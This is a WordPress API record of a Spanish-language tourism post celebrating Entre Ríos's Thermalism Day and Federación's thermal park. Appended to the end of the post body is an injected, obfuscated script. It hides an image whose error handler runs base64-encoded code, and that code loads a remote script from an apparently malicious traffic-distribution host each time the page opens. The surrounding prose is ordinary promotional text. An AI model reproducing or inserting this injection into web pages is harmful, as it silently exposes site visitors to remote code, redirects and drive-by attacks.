{"id":7635,"date":"2023-11-24T11:36:06","date_gmt":"2023-11-24T14:36:06","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7635"},"modified":"2025-08-13T15:50:26","modified_gmt":"2025-08-13T18:50:26","slug":"declaracion-del-termalismo-en-entre-rios","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7635","title":{"rendered":"DECLARACI\u00d3N DEL TERMALISMO EN ENTRE RIOS"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Federaci\u00f3n fue la ciudad pionera en la explotaci\u00f3n de un recurso que cambi\u00f3 la realidad tur\u00edstica en la provincia y es su atractivo m\u00e1s fuerte.<\/em><\/h3>\n\n\n\n<p>El 24 de noviembre en la Provincia de Entre R\u00edos SE CELEBRA EL DIA DEL TERMALISMO que fue declarado por Ley Provincial, cuando la C\u00e1mara de Diputados aprob\u00f3 el proyecto que obtuviera media sanci\u00f3n en el a\u00f1o 2015 y que definitivamente declara el 24 de noviembre \u201cD\u00eda del Termalismo en Entre R\u00edos\u201d.<\/p>\n\n\n\n<p>Se defini\u00f3 esa fecha porque fue un 24 de Noviembre de 1994 que surgi\u00f3 el agua termal en nuestra ciudad Federaci\u00f3n, posicion\u00e1ndonos como la Primera Ciudad Termal de la Mesopotamia Argentina, luego de un incesante trabajo entre vecinos, profesionales, entidades intermedias que conformaron Comisiones, el Poder Ejecutivo, el Legislativo y simples ciudadanos so\u00f1adores que se sumaron entre todos, sin mezquindades pol\u00edticas, donde solo prevalec\u00eda el \u201cInter\u00e9s General y el Crecimiento de la ciudad\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n.jpg\"><img decoding=\"async\" width=\"960\" height=\"720\" data-id=\"7637\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n.jpg\" alt=\"\" class=\"wp-image-7637\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n.jpg 960w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-300x225.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-768x576.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-265x198.jpg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-696x522.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-560x420.jpg 560w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-320x240.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-480x360.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/357088562_275629928474468_4486017250779777052_n-800x600.jpg 800w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n.jpg\"><img decoding=\"async\" width=\"960\" height=\"640\" data-id=\"7638\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n.jpg\" alt=\"\" class=\"wp-image-7638\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n.jpg 960w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/391628336_333996239304503_1087816243944605470_n-800x533.jpg 800w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"383\" data-id=\"7639\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-1024x383.jpg\" alt=\"\" class=\"wp-image-7639\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-1024x383.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-300x112.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-768x287.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-1536x574.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-2048x765.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-696x260.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-1068x399.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-1124x420.jpg 1124w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-320x120.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-480x179.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/termas-de-federacion-parque-acuatico-02-800x299.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>No es menor recordar a los Inversores, a los pioneros, los que a partir de ese momento se jugaron el \u201ctodo por el todo\u201d, y sin pensarlo dos veces comenzaron a poner desde sus primeros ladrillos hasta hacer sus primeras artesan\u00edas; haber logrado que se declare el 24 de Noviembre el D\u00eda del Termalismo en Entre R\u00edos es un merecido reconocimiento hacia ellos, los que estuvieron convencidos que a trav\u00e9s del agua termal se pod\u00edan elaborar, promover y potenciar pol\u00edticas concretas de desarrollo de todas las regiones del litoral argentino, ya que la presencia del Acu\u00edfero Guaran\u00ed, as\u00ed lo permite y generar nuevas instancias de oportunidades a cientos y miles de personas que est\u00e1n relacionadas con esta actividad noble y saludable.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1.jpg\"><img decoding=\"async\" width=\"474\" height=\"474\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1.jpg\" alt=\"\" class=\"wp-image-7636\" style=\"aspect-ratio:1;width:326px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1.jpg 474w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1-300x300.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1-150x150.jpg 150w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1-420x420.jpg 420w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/OIP-1-1-320x320.jpg 320w\" sizes=\"(max-width: 474px) 100vw, 474px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Nuestro bello parque termal y parque de juegos acu\u00e1ticos de aguas termales donde la diversi\u00f3n est\u00e1 asegurada para toda la familia con Pileta de Olas, un r\u00edo lento de m\u00e1s de 600 metros y diferentes propuestas de toboganes y juegos para disfrutar a cualquier edad y este es uno de los m\u00e9ritos a reconocer en nuestra ciudad, la b\u00fasqueda incesante de nuevos mercados poniendo al alcance de todos las virtudes y privilegios de disfrutar y beneficiarse con las bondades de las aguas mineromedicinales, que no requieren de un tratamiento espec\u00edfico de salud para aportar a nuestro organismo, bienestar.<\/p>\n\n\n\n<p>Federaci\u00f3n desde hace veintinueve a\u00f1os sue\u00f1a y vive los privilegios de ser la primer ciudad termal de la Mesopotamia argentina y conserva el liderazgo a\u00f1o a a\u00f1o de un turismo que ya no tiene temporadas, y que permanece actual y vigente renovando compromiso de m\u00e1s y mejores servicios para quienes en cada oportunidad visitan la ciudad y se maravillan.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Federaci\u00f3n fue la ciudad pionera en la explotaci\u00f3n de un recurso que cambi\u00f3 la realidad tur\u00edstica en la provincia y es su atractivo m\u00e1s fuerte. El 24 de noviembre en la Provincia de Entre R\u00edos SE CELEBRA EL DIA DEL TERMALISMO que fue declarado por Ley Provincial, cuando la C\u00e1mara de Diputados aprob\u00f3 el proyecto [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7640,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,17],"tags":[],"class_list":["post-7635","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7635","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7635"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7635\/revisions"}],"predecessor-version":[{"id":10260,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7635\/revisions\/10260"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7640"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}